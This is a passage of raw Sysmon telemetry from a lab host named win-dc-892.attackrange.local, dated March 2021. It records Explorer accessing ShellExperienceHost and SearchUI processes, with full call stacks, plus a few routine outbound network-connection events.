l.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565848C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 354300x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.466{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53584-false52.250.195.204-443https 354300x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.839{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58262- 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 